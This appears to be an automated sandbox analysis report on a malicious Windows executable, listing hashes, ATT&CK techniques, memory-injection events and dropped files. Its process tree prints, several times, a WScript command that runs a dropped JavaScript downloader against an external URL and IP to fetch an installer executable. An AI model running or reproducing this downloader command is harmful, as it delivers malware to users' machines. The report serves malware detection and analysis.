b08ec6b859357b2217ef4cb989a96bb2de9b7635ce2e835fd0e5ab26cdd4eba9

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
05/06/2024, 09:22

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe
Size

184KB
MD5

97baf34f347bef8b8d2984540ba5109c
SHA1

8f4b528a2c171a0459723db7fc487cdb7633e513
SHA256

b08ec6b859357b2217ef4cb989a96bb2de9b7635ce2e835fd0e5ab26cdd4eba9
SHA512

daaf9b41c20101bb06f6bcd819617cfbf08d61f4b7b7fb2220d9d7aedf04ee0bd576bd5a83670aaac9d56ad3820fbcb4ef0a24b8659c682aef8118267e4119e8
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3n:/7BSH8zUB+nGESaaRvoB7FJNndnW

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2884	WScript.exe
8	2884	WScript.exe
10	2884	WScript.exe
12	2680	WScript.exe
13	2680	WScript.exe
15	1772	WScript.exe
16	1772	WScript.exe
18	2216	WScript.exe
19	2216	WScript.exe
21	1472	WScript.exe
22	1472	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1192 wrote to memory of 2884	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	28
PID 1192 wrote to memory of 2884	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	28
PID 1192 wrote to memory of 2884	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	28
PID 1192 wrote to memory of 2884	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	28
PID 1192 wrote to memory of 2680	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	30
PID 1192 wrote to memory of 2680	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	30
PID 1192 wrote to memory of 2680	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	30
PID 1192 wrote to memory of 2680	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	30
PID 1192 wrote to memory of 1772	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	32
PID 1192 wrote to memory of 1772	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	32
PID 1192 wrote to memory of 1772	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	32
PID 1192 wrote to memory of 1772	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	32
PID 1192 wrote to memory of 2216	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	34
PID 1192 wrote to memory of 2216	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	34
PID 1192 wrote to memory of 2216	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	34
PID 1192 wrote to memory of 2216	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	34
PID 1192 wrote to memory of 1472	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	36
PID 1192 wrote to memory of 1472	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	36
PID 1192 wrote to memory of 1472	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	36
PID 1192 wrote to memory of 1472	1192	97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1192
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf31F9.js" http://www.djapp.info/?domain=qmSDoVtdyN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf31F9.exe
  2⤵
  - Blocklisted process makes network request
  PID:2884
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf31F9.js" http://www.djapp.info/?domain=qmSDoVtdyN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf31F9.exe
  2⤵
  - Blocklisted process makes network request
  PID:2680
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf31F9.js" http://www.djapp.info/?domain=qmSDoVtdyN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf31F9.exe
  2⤵
  - Blocklisted process makes network request
  PID:1772
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf31F9.js" http://www.djapp.info/?domain=qmSDoVtdyN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf31F9.exe
  2⤵
  - Blocklisted process makes network request
  PID:2216
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf31F9.js" http://www.djapp.info/?domain=qmSDoVtdyN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf31F9.exe
  2⤵
  - Blocklisted process makes network request
  PID:1472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
7357fa5c905c3d2772e5e992523203bb

SHA1
7fe955c95b9a93bbabb4aae0c81ad201b3e09130

SHA256
53c909e9d2a2cd0414ab8d6552c28fb6a2e1e425f38dbd11307aff4c8ed1c04e

SHA512
c7303f7be59538b6f26143da757d50f35c5ab973f401fec8ac4d1a9d9e3d30116c0b155674c9e84b41fb14e7adea88a52c8675c9c79e9e840828a35320143760

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
b9a18bef67dc155fa1f038655e1970f8

SHA1
4c68555e2792eeff54b459e11ba9796060897e63

SHA256
754b298d8fc905846d9afcb874f5eacabe50c0d250338c6505017da7a3ea2e74

SHA512
696f3ae25a48b3dea9e47a27834443587440c6e14835be7bab00a8b482d6760dc5ba8ba28dd5bbcaffde849dbce3d35160c28350e3264518c0db3a677f931b67

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
23e770bc37b8d309baf248c546d5c679

SHA1
39e540d049578d2529abf1030ecdb1d1e7776d9c

SHA256
e79acb6021382c412d668159d61999800511fcc4bf55c133707c6898cf9433c6

SHA512
f1c62cdbc7b34312cb79dd8605d0636e2ee82913044822eef5d0c5f311abfbff3fd14c8513b8c603b2a80b0bce2d2b218edd794a14ee606f29d2c25964556d1f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
9ce61537dbd3e670361858265f86fa96

SHA1
fe6e042bee1c08d5f5a407a27c2e0c9dd44ef345

SHA256
574ddcf4916fb811930b3db5a07769b7eb9b84a5c0731bbc544f2f670eabea47

SHA512
def49b9cc18ed34a04a82f493ff26c421cae3360e9afa8e2fa3d85342a15aa9f00ca13feb025829e82276f8ce5aeeaa9db31ccbb886d2f4540116c2629fbbf9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm

Filesize
40KB

MD5
ccbefb6af868dc21aec59e01d512bb08

SHA1
5ca723bde1032bc3e82d4fdc7e7b25201d8c2a95

SHA256
e8c132a34a7fd9c6dba4c3b20e786d5040bb737fab78ca6b05bbbadee29d8ee4

SHA512
a07e0808f84027d656d8b1171d35bcf5a277ed5993f89a8c512cffb7fe16538cb6bab95686a375500978e72b48e50d18bad2fe0c4b8759929c753413f9763381

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm

Filesize
6KB

MD5
98c2e848e17ba6a01256aebacd1d0aed

SHA1
b33dd87861fc7426a207f2f901219f7478e69085

SHA256
b1332380d039f44237006e753f5a29c0c89f4f6e17799009ebb9af8d0d7798f7

SHA512
e3f58cd2ec3b45d750346175bf91ac5faec1fadbe4baae38c828d52fc19cc3a157e29a2321eae542545ad1911e2f61e21aff6893633b4f973db29cae7d70838b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

Filesize
40KB

MD5
dfc193b647ad03215b1023565285d10c

SHA1
b363a9e9bdd0ca66a497bb5018858c263cfafa1f

SHA256
ad4f47e30de3e2c1323ff524634bb4a2b959a240e329303afde3387a50eedb0d

SHA512
bb7effe231b64c3efcef8f082814cfe02eda31e33714c6f0251b366a806efbb519e109741f47496337a4769c86147166933eb7fa58a40d2645ac524e24bce6e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

Filesize
6KB

MD5
c2bf2ba6cbcfca7c2c37c728335579f5

SHA1
773ab87b5ab250780a141df7f9897b7b3eff0eeb

SHA256
d455e284a40e4ff4c98dbf4e00d857b70c6f8cf64b6e02755010c60c744f9473

SHA512
40cedb626838c849c07ea07938f462874ce0bf59b85383333bb8c3cf6e2fff795f01106f643f1c9b6b7a56ca43aa46a8cc99b2eb2695a9511d20422aed2984ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab6162.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar79E2.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf31F9.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\VD114O5C.txt

Filesize
177B

MD5
1eff8df69cc380cb9bb040dd77d3dd38

SHA1
57348b55825f809e81496547f7f03a746a10e49f

SHA256
b0dde1b5cf3347c4ca1c68f86491ace19eb775cde060f7ad6980f32424960795

SHA512
84ddf851cee8138d8150f9f19965c532b1b08781144b562cdcbde31ddfc71cdd401d64c1b67bf2a6ade328a1dce6581922daf4f31e65e25bda0b917eb313679f

Download Submit